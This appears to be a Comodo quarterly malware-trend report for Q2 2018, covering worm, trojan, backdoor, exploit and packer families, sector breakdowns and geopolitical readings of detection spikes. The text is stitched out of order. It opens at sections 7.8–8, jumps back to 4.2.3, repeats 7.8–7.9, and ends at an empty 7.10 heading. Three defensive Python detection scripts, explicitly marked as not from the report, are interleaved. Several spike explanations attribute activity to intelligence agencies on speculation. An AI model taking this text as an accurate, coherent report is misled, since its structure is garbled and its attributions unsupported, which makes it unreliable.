Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


4.2.3 June 2018

[Chart: Android-targeted malware detected in June 2018; vertical axis 0 to 300,000 detections]

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
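The behaviour attributed to Starter above, a fresh local account being created and then added to the administrators group, leaves a clear trail in the Windows Security log. The following Python script is an added example (not code from the Comodo report or from Microsoft) that correlates the two events involved; the event IDs 4720 and 4732 are real Windows Security event IDs, while the one-line-per-event export format, the five-minute window and all sample records are constructed for this illustration.

```python
"""Correlate Windows Security events to catch a newly created account
being dropped straight into the Administrators group.

Added example, not code from the Comodo report. Event IDs 4720 (user
account created) and 4732 (member added to a security-enabled local
group) are real; the export format and the sample records are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed sample export: timestamp|event_id|subject|target|group
# (for 4732 the "target" column holds the member that was added).
SAMPLE_EVENTS = """\
2018-06-03T09:12:01|4720|jsmith|backup_svc|
2018-06-03T09:12:02|4732|jsmith|backup_svc|Administrators
2018-06-03T11:40:10|4720|it-admin|new_hire|
2018-06-03T15:05:44|4732|it-admin|new_hire|Remote Desktop Users
2018-06-04T02:33:15|4720|SYSTEM|RemoteSvc|
2018-06-04T02:33:16|4732|SYSTEM|RemoteSvc|Administrators
2018-06-05T10:00:00|4732|it-admin|jsmith|Administrators
"""

ACCOUNT_CREATED = 4720
MEMBER_ADDED = 4732
PRIVILEGED_GROUPS = {"Administrators"}


@dataclass
class Event:
    when: datetime
    event_id: int
    subject: str   # account that performed the action
    target: str    # account created (4720) or member added (4732)
    group: str     # group name, only meaningful for 4732


def parse_events(text: str) -> List[Event]:
    """Parse the pipe-delimited export into Event records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, event_id, subject, target, group = line.split("|")
        events.append(Event(datetime.fromisoformat(when), int(event_id),
                            subject, target, group))
    return events


def find_fast_tracked_admins(events: List[Event],
                             window: timedelta = timedelta(minutes=5)
                             ) -> List[Tuple[str, datetime, datetime]]:
    """Return (account, created_at, added_at) for every account that was
    created and then added to a privileged group within `window`.

    A long-standing account added to Administrators (the last sample
    record) is not reported: there is no matching creation event.
    """
    created_at = {}
    hits = []
    for ev in sorted(events, key=lambda e: e.when):
        if ev.event_id == ACCOUNT_CREATED:
            created_at[ev.target] = ev.when
        elif ev.event_id == MEMBER_ADDED and ev.group in PRIVILEGED_GROUPS:
            t0 = created_at.get(ev.target)
            if t0 is not None and ev.when - t0 <= window:
                hits.append((ev.target, t0, ev.when))
    return hits


def fast_tracked_account_names(text: str = SAMPLE_EVENTS) -> List[str]:
    """Convenience wrapper returning just the flagged account names."""
    return [name for name, _, _ in find_fast_tracked_admins(parse_events(text))]


if __name__ == "__main__":
    for name, t0, t1 in find_fast_tracked_admins(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT: {name} created {t0}, made admin {t1} "
              f"({(t1 - t0).total_seconds():.0f}s later)")
```

On a real host the records would come from an exported Security log or a SIEM rather than the embedded string; the five-minute window is an assumed tuning value, and a stricter deployment would also weight a creating subject of SYSTEM or a service account, since legitimate administrators normally create accounts interactively.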

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
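Because most of the quarter's exploits arrived as PDF files, a first-pass triage that looks at what a document can do when opened is a useful defensive check. The script below is an added example, not part of the Comodo report: it scans for the PDF action and script names that exploit documents rely on, undoing the two cheap evasions of hex-escaped names and FlateDecode-compressed streams. The risky name keys are real PDF syntax; both sample documents are constructed here and contain nothing more than a harmless app.alert() call.

```python
"""Static triage of PDF files for the action and script features that
exploit-laden documents rely on.

Added example, not code from the Comodo report. The PDF name keys checked
are real PDF syntax; the two sample documents are constructed here.
"""
import re
import zlib
from typing import Dict

RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
               b"/Launch", b"/EmbeddedFile", b"/RichMedia")


def normalize_names(data: bytes) -> bytes:
    """Undo the #xx escape PDF allows inside names (/Open#41ction)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Return the concatenated contents of every stream that inflates with
    zlib, so names hidden inside /FlateDecode streams become visible."""
    chunks = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # uncompressed or differently encoded stream
    return b"\n".join(chunks)


def triage_pdf(data: bytes) -> Dict[str, int]:
    """Count risky name occurrences in the raw bytes and in inflated streams."""
    visible = normalize_names(data) + b"\n" + normalize_names(inflate_streams(data))
    counts = {}
    for name in RISKY_NAMES:
        # the lookahead stops /JS from also matching /JSomething
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", visible))
        if n:
            counts[name.decode()] = n
    return counts


def _pdf(objects) -> bytes:
    """Assemble a minimal PDF from object bytes (constructed helper)."""
    return b"%PDF-1.4\n" + b"".join(objects) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


BENIGN_PDF = _pdf([
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>\nendobj\n",
    b"4 0 obj\n<< /Length 33 >>\nstream\nBT /F1 12 Tf (Hello, world) Tj ET\nendstream\nendobj\n",
])

# Hides the script inside a Flate stream and escapes /OpenAction as
# /Open#41ction, the two evasions the triage code handles.
_hidden = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>")
SUSPICIOUS_PDF = _pdf([
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >>\nendobj\n",
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /AA << /O 4 0 R >> >>\nendobj\n",
    b"4 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(_hidden)
    + _hidden + b"\nendstream\nendobj\n",
])


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, triage_pdf(doc) or "no risky names")
```

A hit is a reason to detonate the file in a sandbox or open it with scripting disabled, not proof of an exploit: legitimate forms use /JavaScript and /AA as well. Streams that use other filters (ASCIIHex, LZW) or documents that are encrypted will not be inflated by this simple version, so an unreadable stream in a suspicious context deserves the same attention as a hit.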

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is “packed” refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
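The packer behaviour just described, a small unpacking stub plus a compressed or encrypted body, is visible in an executable's section table without running it. The following Python is an added example, not code from the Comodo report or from the UPX project: it parses the PE section headers and flags sections that either use UPX's default section names or have byte entropy near the 8-bit maximum, which is what compressed or encrypted data looks like. The two sample images are built by the constructed build_pe() helper and are header-only skeletons, not runnable programs; the 7.0-bit threshold is an assumed tuning value.

```python
"""Spot a packed Windows executable from its PE section table.

Added example, not code from the Comodo report or from UPX. The sample
images are constructed by build_pe() and are header-only skeletons.
"""
import hashlib
import math
import struct
from typing import List, Tuple

KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}  # UPX's default names
FILE_ALIGNMENT = 0x200


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 max."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """Return (name, raw bytes) for each section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_header_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_header_size  # first 40-byte section header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(image: bytes, entropy_threshold: float = 7.0):
    """List (section name, reasons) for sections that look packed."""
    findings = []
    for name, raw in pe_sections(image):
        reasons = []
        if name in KNOWN_PACKER_SECTIONS:
            reasons.append("known packer section name")
        entropy = shannon_entropy(raw)
        if entropy >= entropy_threshold:
            reasons.append(f"high entropy {entropy:.2f}")
        if reasons:
            findings.append((name, reasons))
    return findings


def _align(n: int) -> int:
    return (n + FILE_ALIGNMENT - 1) // FILE_ALIGNMENT * FILE_ALIGNMENT


def build_pe(sections: List[Tuple[str, bytes]]) -> bytes:
    """Constructed helper: a minimal PE32 skeleton with the given sections."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zero
    raw_ptr = _align(len(dos) + len(coff) + len(opt) + 40 * len(sections))
    table, body = b"", b""
    for i, (name, raw) in enumerate(sections):
        padded = raw + b"\0" * (_align(len(raw)) - len(raw))
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(raw),
                             0x1000 * (i + 1), len(padded), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += padded
        raw_ptr += len(padded)
    headers = dos + coff + opt + table
    return headers + b"\0" * (_align(len(headers)) - len(headers)) + body


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (a SHA-256 chain), constructed."""
    out, h = bytearray(), b"constructed seed"
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


_PLAIN_CODE = b"\x90" * 64 + b"Hello, benign program\0" * 20
CLEAN_IMAGE = build_pe([(".text", _PLAIN_CODE), (".data", b"\0" * 256)])
PACKED_IMAGE = build_pe([("UPX0", b""), ("UPX1", _pseudo_random(4096)),
                         (".rsrc", _PLAIN_CODE)])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_IMAGE), ("packed", PACKED_IMAGE)):
        print(label, packer_indicators(img) or "no packer indicators")
```

The entropy test matters more than the name check: packers other than stock UPX, and modified builds of the kind the text calls MUPX, commonly rename their sections, but they cannot make compressed data look like ordinary code. Large legitimate resources (embedded images, signed installers) can also score above 7 bits, so treat a hit as a triage signal to unpack and inspect further rather than as a verdict.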

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to “kill” it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information, but merely to have fun at the victim’s expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application” or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and “system optimizers”.

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. These are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section, let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical’s top malware type.

Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let’s examine “Zbot”, which is another name for the “Zeus” Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.

7.10 Finland, Russia, USA

